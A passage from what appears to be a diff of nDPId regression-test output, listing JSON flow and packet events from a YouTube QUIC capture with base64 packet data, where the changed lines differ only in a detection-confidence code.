AA"} 
-00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363823466,"flow_last_seen":1489363823466,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1489363823466,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":54997,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"pagead2.googlesyndication.com","user_agent":"beta Chrome\/57.0.2987.98 Intel Mac OS X 10_12_3"}} +00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363823466,"flow_last_seen":1489363823466,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1489363823466,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":54997,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"pagead2.googlesyndication.com","user_agent":"beta Chrome\/57.0.2987.98 Intel Mac OS X 10_12_3"}} 
00964{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1489363823467,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":427,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":427,"pkt_l4_len":393,"thread_ts_msec":1489363823467,"pkt":"gCqojWksxCwDBkn+CABFAAGdQ1YAAEARAADAqAEH2DrNQtbVAbsBiWjHDZNw4V58RG0IUTAzNQIjOTX0HE3l5Scr7Fgx2f\/r+qyKcH\/8LtiyPftQGYB9rCN29+bVRC8cQk9\/xGvEd6aBS8oqh8NZIxXxQWKlTa8RiJV0BMsIA0J2xai1sihftSstpiUm4Hfb5ePoNWBO9sfumkF4vn\/9w\/9icDJdGccA4OzurorhUAKZSZXQ2C+f4aKf6nX2PELscDc2K8rYtLquJGdtKf4c79ur+nT\/zIZbwAI5FHcm2kTejfWn+vqhJAD0GuZjr1fez\/qk2C34VbRcKzU+r3sMaPUtMdGtgzscnCkXVApYI9m9bd3dzj+CzxW8qOJ7mCU2emBxJ\/DIq4W6MZVOQ8P1s290Mflqj2Ld8WgZbVsDG+nGkhewE4Z8dkUPa+UkVgjTddS58Gokmrg9Z3Adl+QFItNyGTCZv48hVxEemek454JnWb6oZl4ujKpXhQA0CaX5LNroX5y5o\/Wny9SJ17j8aIxrDR0s65vzthwadNOZLJ62NA+MTWY0IQjOuA=="} 02268{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1489363823527,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1489363823527,"pkt":"xCwDBkn+gCqojWksCABFAAViAABAADcR117YOs1CwKgBBwG71tUFTuocBCh3B7XiTuKXN4LFlWznTXqPOMTIP1YB45lXi+l5CF8JASyEKKaDONFN5YR3rA\/p9CKVXhUMWNxz3dKUg1yQftOAuLAuCFZHEo433jmLn2X4f\/Owuck2m9UesvdXoxzwq4xDpUXHvNH9PzNMS1XtEZ0KDZ904pHEN+ZkjUiA2jK\/AWrBBVjEsqHcAMngSVXjIyTLuIfTfT50KGoQr9mSm5SWUDtU4w+2DwTLde4slXrVb5tsrZJ9hx6FXeBCOwNcjEoeHA7do276\/9KH1k58X3zu+PQcEwnHQBIs5Nvjxz0m7lZ\/e4WfsWAx90HOH6likwa4aRKygVjLaiXObj1BRuaQFXdbITUHeb\/v1Bb0ex9qIwx0kcogAUVq6KGcRlImR2VCET7Q2UPfBF1HkA3bAqvJ6t1BP07HS8IKIEm70QgionKkRzGiFzdUhT09R6zdeXllUpiA63fBrBRfZD4ih6nX4zo\/yc\/lz+z\/tYWWCPtitjIx3R+MsYy6evVwKHmKh4xLbNgtf6Bu5FREacax96iyQP2\/vuAdKPy+I6gMbTz04jy4zg2nTKOKHNa3aAGNL
9B3Uh5t6mqJXuzsLfLLTPDw3wrJPan+M\/0XoefuuxvaucM7CeSe1bcynXGH+VeCKK3X6BEjxAIAyaIH3WN4GasKfIjmi2abIP71bMldE4Rrc0QpuysWWFnpQQt9pN2sP40R1CWaJEjWn2UIOe0P10GgnLa0xDEY45T4mm1G5cRaybTY1lDhwEfyXyWZ9AZfiHELWMCRxQrjRsfwPjDlL6jHi\/zHIUWOI\/T4jgDqU2KclKtGJHvbzyipTcTSry1Z9gmEkVPVvz\/8EjMnwGHjnltQ6Dn6FOkOgVFgA2iD5qiIgNLtjkUfH1GBvC5KbT9MfqpK2j2k4rSt9zbnBWSsgHnKyvlhVlk4OSMFjMkESHpv2MoP7kPpHn9hYZR+DGSK3WZiE2JTywLeaTFpsQZ3daTQq1Vr04zxtlC9vRWSZgVtzp+73FUoayEpGTdeO3UERRAep7Gz6OHwglh0vTs4C4cI3glPhuREbf69JIx21MPWU3j5sPCPzg7nPp1rI9ewTvRn38IUIjcvV1KuUH4IRVmz5W6wsHwHFtnkwFNuxtYxLxpK0EDIngGp5d6ht7210ydmiQr6O0ON8qJtc3t5+jXn6ntXD+RhEqv4GCaMWHbVrUNZALDxj9JvSEzyroxEuoApEO8TL\/ZdVC\/slwR1pM3JdbAsWN2rxIFLM5krFwOakRgi754xhdBEry7MgvTwiHsgDJ3Rg3jSdB9jubcVT3HICTRmj1vR\/GLDAyPIFAzuuaVmpolrsQwDxFuyNGOcjHVBUbeP6bnCaCs1JfK35oan09836\/37ZWojhkKHAUoDUCP0eOYnRmUhbwOggCe7+p8hW83\/lILFNK1NDMAm7qAsqoccxqNT61ke0qmot69NhPXpwpGUt\/gK3nyvFne4lsK7S7r1eMvI29rlDBY0L\/e2MX+l+NFFonVbYbxqlVZxk5h57Py0nXsSE5q43RZq\/Ab5Ljnrfv\/qOWasfLkVsR95Ih7otWzubnTYoOB5dgkPlalnkY+ZT0ynhrpD6iNCVYd4popCzZS+uE59ZqtbLuU6i6Oh3yTkUuBN6l4rJS\/6y1YL+YBtywlzVVi2gqoBTO6RyHcXMeDc6anBpSJn+Y11FC9lfnd1ZBuVxPW\/4cBKWMy9IKMGLXE8iIH1zC\/mEqW8ZtRWLvviks2j2E9BFu9ovslgURdyPBgw2o0Whiqb07OoUWWMBoSXHynCDs+gbza+6qUl"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363823738,"flow_last_seen":1489363823738,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1489363823738,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.198.33","src_port":56074,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02245{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1489363823738,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1489363823738,"pkt":"gCqojWksxCwDBkn+CABFAAVi1UgAAEARAADAqAEH2DrGIdsKAbsFTmVrDWI\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\/TTNQYjpQh1bWy1pxKNWlJuoLy5bOHLwnEpeZAAAAAEAAAAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363823738,"flow_last_seen":1489363823738,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1489363823738,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.198.33","src_port":56074,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"yt3.ggpht.com","user_agent":"beta Chrome\/57.0.2987.98 Intel Mac OS X 10_12_3"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363823738,"flow_last_seen":1489363823738,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1489363823738,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.198.33","src_port":56074,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"yt3.ggpht.com","user_agent":"beta Chrome\/57.0.2987.98 Intel Mac OS X 10_12_3"}} 02259{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1489363823782,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1489363823782,"pkt":"xCwDBkn+gCqojWksCABFAAViAABAADUR4H\/YOsYhwKgBBwG72woFTqYeCGI\/o1o3gkQjAfrje9Hje5P995YFE4ABUkVKAAgAAABTVEsAPAAAAFNOTwB0AAAAUFJPRroAAABTQ0ZHWQEAAFJSRUpdAQAAU1RUTGUBAABDU0NUVwIAAENSVP\/\/BQAA+LXECKXyXyaGkNvk1LnkKe2HcwZSdJKMjSZdwRtRvlgkC7wrIojsxa12VSbQ+UqytsSw5ZWrAguctbN84e+itVKKdDan60SbCn6HO8EhAZXhZCoi6zTXVPfruFP+xbK0jobs4P1ETvvj7642AaRXoyX3AiUwRAIga0VZvCZ3TBiWNQTgv6KY8y2d9RkggowYQwi1RHlUtm4CIDUxV08RC49VVgJORrtGSNh+UsyMA8+5V0kTzoS1\/6EyU0NGRwgAAABBRUFECAAAAFNDSUQYAAAAUERNRBwAAABUQktQIAAAAFBVQlNDAAAAS0VYU0cAAABPQklUTwAAAEVYUFlXAAAAQUVTR0NDMjBrdmP1GwKyBEvvwtZJjj6PQ0hJRFRCMTAgAAC7MI00KZ1MP25xAs8ApFxY\/QSpEMcZP7AIDZmbDnFGD0MyNTUwMDAwMDAwMEDbx1gAAAAADAAAAND3AQAAAAAAAPAAdQDuS723dc5guuFCaR+r4Z5mow9+X7By2IMAxHuJeqj9ywAAAVplaZe7AAAEAwBGMEQCIFrxuSR6yQfoERjhpyCo\/HC4DbnJyy5PDUNSQYvoLd7WAiA1du1k\/DfC+hSnbCFZ+CiZL\/WBsCA2tHRh+V5os9e8wAB3AN3rHSt6DU+mIIuBrYFocH4ujp0B1VyIjT0RxM227L7MAAABWmVpmAsAAAQDAEgwRgIhAK1Z+StuHvhEQzbhrizA0oP28zksTi\/aWkPYynKMWI7wAiEAoZsd0Sdt7uEo3XB3wMmgRGZNny2cfedCYnG3zpLag4YBA37tgIaiFYKRAgAAAAMB6IFgkpIa6AAAAAAAKgcAAHi7gTUtv1NjZwCWXOxKBk1sXJA2HIf55ae2MzL3PkFvyFGxkQUqDMwNjIyMgPkFmJfA7TkDUyC2MDUHdaIKsVrFwcPlDEw3aflFeZmJsATJzsPrm1+aVwJKXWGZqeVwd\/EguwvUlgC5i0dcCximIGFgJilKBqbG1Dxw1BtEGgizsQO9e84W2BLhADOYGdmZnRhYMt6FvD+wnV996Zw\/hsoKnDX1AkfE3LjmrmD0Xbj\/45IfeVee\/OywebVOPSnedOpTyamR\/2zN7jmfePP5sO3s0PyvawoWN7GsN2hiWU2oLGtizgMpEGRpYk4FchKbcLm1SUZLL7GgoBiHrApEtiAfzNUrBqaYxPRUqGJgYi4Gq+LT0kvKyU+HKWsSB
PILUIWUtEBUbn4eMKcm4jBGE6QGbLcuVIVuSn55Xk5+Ygq6UnVMpaUF2BQqYChEVwEMgJT80qSc1OSczORs9ADgBoZbekEG3F8QzSnAIioVLAQP1+LKvBRo5QWWEIFJlKcm5WSmQ02Q19IrTkxLzSstwBHgYAV5KUn5FTgUKGrpEQoceYQS7IEioYUrJhFa9YpTgUFSgq6AByVW+dGjWYFgJEvhCWxORFDzowe0KPbgEMISyNrFJcB4SNYrSMwDOiE3Mx9f2hXDIS6LPxz4S\/PSMnOA5VFqil5eankxUtuLvcEgA6kEjwGWQdpIZbM8tLgsyM6EGgoukd09Hd2NwIWvNlJxD1MMDC6gj4sNkXWAqgCk9qDW3+B7S2xzw150iDxJLJ4oWT2f5yFamwi5WMfaiVKENDKAtRxaz4WDjS29kQdYohsYQFpFmgbqBqoLlBco"} 02254{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1489363823783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1489363823783,"pkt":"xCwDBkn+gCqojWksCABFAAViAABAADUR4H\/YOsYhwKgBBwG72woFTtjVCGI\/o1o3gkQjAl1iY1+IPhyu0ittLaQBLgUZARLyTw62Xo9mQ7Tn55dir+alTNnl+EuTXetgrtU\/li3WZUF3t3EtPfqBg1nJrPp7bar7qdPHbjH8jwhk+pimkWuq6rVs4cviafuTL\/pWbDvkJD1zwixjdUFbM0aGipe63\/v0luly7P6xK4d1\/V35zVlHfZnq9OpLDbRdp3F95Wn77GK+6cqsr8cEfY77RjhzSh7Unhdryl2mU\/IhTPRZgsMXhZ65ayI6rm07a3GnaGsF6wp\/3rLVzcqh63smBXkUr5RrfvOpMsbbX\/13ZPXcymfXdeZ+LWmcELGYmfOd+prGpXeZdtiyB0ssnuZwNOYGp72hD8PxC2ds8mZMXnnvqd7Gb2w82Yw3Hn\/6nvVjXthRi\/UnDQF+1X0RAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":134,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363824401,"flow_last_seen":1489363824401,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1489363824401,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":53859,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02253{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1489363824401,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1489363824401,"pkt":"gCqojWksxCwDBkn+CABFAAVisIYAAEARAADAqAEH2DrNQtJjAbsFTmyMDXhX73QJ\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\/AA7IChJw\/uFk6rkJtT8KHam\/zP1YJxL1R6PGerdhviM0jsqfVXK1sMGRgIfu1Gw5yjD\/\/Q\/fKW3aZLxbK0ZZAAAAAEAAABDMjU1qvorPqjeOwuq+is+qN47Cz2t9HxBefiRQAt7kKmueet+NAEAgygqfGXu0L2syT5vA8mDxoSqG087cDiVovZ6s0ywmTUWtgw5lXy+Ac4T6qWEMJOPvUqVQrabfhIiKh6bU4h\/Diu+B3D3YFOkHFOA3JEmhpJ\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"} -00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":134,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363824401,"flow_last_seen":1489363824401,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1489363824401,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":53859,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"beta Chrome\/57.0.2987.98 Intel Mac OS X 10_12_3"}} 
+00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":134,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363824401,"flow_last_seen":1489363824401,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1489363824401,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":53859,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"beta Chrome\/57.0.2987.98 Intel Mac OS X 10_12_3"}} 02268{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1489363824401,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1489363824401,"pkt":"gCqojWksxCwDBkn+CABFAAViiX4AAEARAADAqAEH2DrNQtJjAbsFTmyMDXhX73QJ\/9nIUTAzNQL3N20WC4prgrlnEEXpdg0UiWbXJhn9rrqPsD7nypSAi6kAnw8WQDgk9WvHBUMq3ztLT3UfD0gz+me7oBLVs9bjXCdM3vfRP04sqX92qJrBMWJiq3+eKjCNhyA3dhTNbGSGyKI7\/jcHFMipWf2f2NsuOihlYKhTPSCEE\/3dxQ5VpSOD4BfoNhUiG4SLXDgBvtHLX5RXQiz6BGmJPkfw0Dv35AvtRBL6UAIgkl\/K+oTxY08q1VHTawdG6K3aOXtZN79Qa45uh7pT1oVWMplxpgw8JT2Arpn6WXMTVuz7IIjcMmVGkmTbz31c16ROCt97FgLzWLKXSjlRTCuInYAnb8OLy7A3ZgiVpjlf24uxYYBETmSsYE22pkbiA3KDPQJQySgTeBTaSmM7bUYZKVC0sqnRUOvf3ZY91A7qJZn\/ba900D1Z+aCkzIM+N0cL4OdjAPHVbjoNNBPob96VT7KYOqrcxvdgiQK4z8YyO7qPdy3wkVPEp8S1cfxO0GcnNc57dkkmdplcftLswiLsyuSbEUEIvemACkZhnlX++EeQWxNqo5pgetjas2fIO3OoczlGrqEelJ1yoqALFrNOoHHqiCTaPzG9Vq6SC5ccc+y0eJXHfhIMNqRedbbXK4yLYwqtZ9myh7TSQTMNDNtNNcokuMoYRffKy+Hilx9blgPA+kxeACnNv8k+XoHbLejLn53fsVGrfJ27oHLpBxd0gpX8C1SW
Myy3mXnpEVSzUrkvObuxIcI1iIIRkXe4ha0xa6JvFSR1XvxPQ5uBs1VZvBiRzdozCrjMOEc9HhPIaepumDcavW6RkKdtpFOTOABhKPB+xTF+tw5twgZvOB6spOi3XFDCLlgZYRUP2AglByKCpQdxHum5b0xn6Bxg+gulV7DAa4F6bq\/phQubcSVFzDkjjddAVTq8Ke7Bcb2PIaw4POMGF8i+3Ejx3gConV0\/n9f+1mrX6y1TPQ+529up7M7aIJBqu\/KbECK4GCmg+69dFQcqMdvDDodT0LicyE6jgNHVr3Xxl9T9WRp\/ZEkID0WaSc8lamVKWuAoEej6VLe9Xsojacxjt0L1ZkVNCdZBeOWPV\/2r27Cc0KxFG00xU+mkL6oc\/P+4mp1vjwqej4OpJO4H7X\/bD1uR+eKFP96VSf8gVXiQ3DmEGxcfGruXncj9yz32x4yvvKzg03pwZiXXTtpaX0N3ObUthGwiiBr3OqJCsJVke4\/DSc35dh+HTeY+td+Oc4jCcwuV2lOoS0dT73DkKXYTbuBravYDZhjPNKQNF+6bWKCm8kZsYuCZUcPzccjiAYkhk0zhBSnaWNqdI6hOWVUghH2pIeRl1S8CHH23kuVsWd8GixiV6+GG7ClvWoVE8MrCJVfuDBih03bB7tpS\/HVKC2E9e6YR1Im8\/dzl\/GrYBeLaQJMx6dvF2cWrBFw9TxwkKIBGesF7P4zSSZnZmPB\/8T0n45nH26wWJrG9slMatMUMQF1ah+pPdZ8x+tlROoO4fF2yjn4px+eRlie\/MHUCbhkcAUhlXdTBiPNIvr7yc+xKglTelzU+igEYMaYRT7qb8rNLbLWFex\/imDEBTq6nYSPvkTgwNxYJA65n\/p6p8VPjqErPaqpEUd07O9wbQiW9G2X\/qbV3yLCPMbA96flDvOZN+LC6\/DnJyMwZn5lo+SBoTbwt518b7bgUS1UA82oVmCGe8vFKQu9\/05aE1OZbqUSUoFxZX0RxFiFxGsclnNnAvgLNexJFieDNVkLIeVZwsdn1VKuKE5NTKqEm\/iO1n+rmnQA3"} 00868{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1489363824402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":356,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":356,"pkt_l4_len":322,"thread_ts_msec":1489363824402,"pkt":"gCqojWksxCwDBkn+CABFAAFWgV8AAEARAADAqAEH2DrNQtJjAbsBQmiADXhX73QJ\/9nIUTAzNQNN4EYmtc8pzVIIOlw5wUUTViVod6Y0+1HgA3vBxmFBB9XdzPolT4EuSqVTYDWG+BQf0+uutBG1cIb1StnXne22+Sa3VBkmnkxHzdhhHTq5RFHE1DzOC1OWyujit50aD9fovXbwARSedQlPJ7gjdJSVfTm6O3nF2k42pradZvrpU1ech4qBDDCfAnmOfCXqI5NXsD3jyb4bcNfoTf5ko+c96L+Kv0ngIjlmGgFFf6vJ8QwUVroovQmrUV9bPxW9NYlbZzDQO3\/aocbUP2HxCiVbIwPbD2Jd4G+p\/+kRB\/3zN\/cBW\/zgsZhwNASU8TEuM0gATTjCn+DvX6KA+8RurPRChvD1WnZ\/ZRI9q2M84tMzgiUjvDAoLSC7i0dr41HUDnzmJH+mr0XOTEoxFNo="} 
-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":289,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":258,"flow_first_seen":1489363823738,"flow_last_seen":1489363826862,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":167659,"flow_avg_l4_payload_len":649,"midstream":0,"thread_ts_msec":1489363826862,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.198.33","src_port":56074,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":289,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1489363823466,"flow_last_seen":1489363824024,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":3933,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1489363826862,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":54997,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":289,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1489363824401,"flow_last_seen":1489363824840,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":7909,"flow_avg_l4_payload_len":439,"midstream":0,"thread_ts_msec":1489363826862,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":53859,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":289,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":258,"flow_first_seen":1489363823738,"flow_last_seen":1489363826862,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":167659,"flow_avg_l4_payload_len":649,"midstream":0,"thread_ts_msec":1489363826862,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.198.33","src_port":56074,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 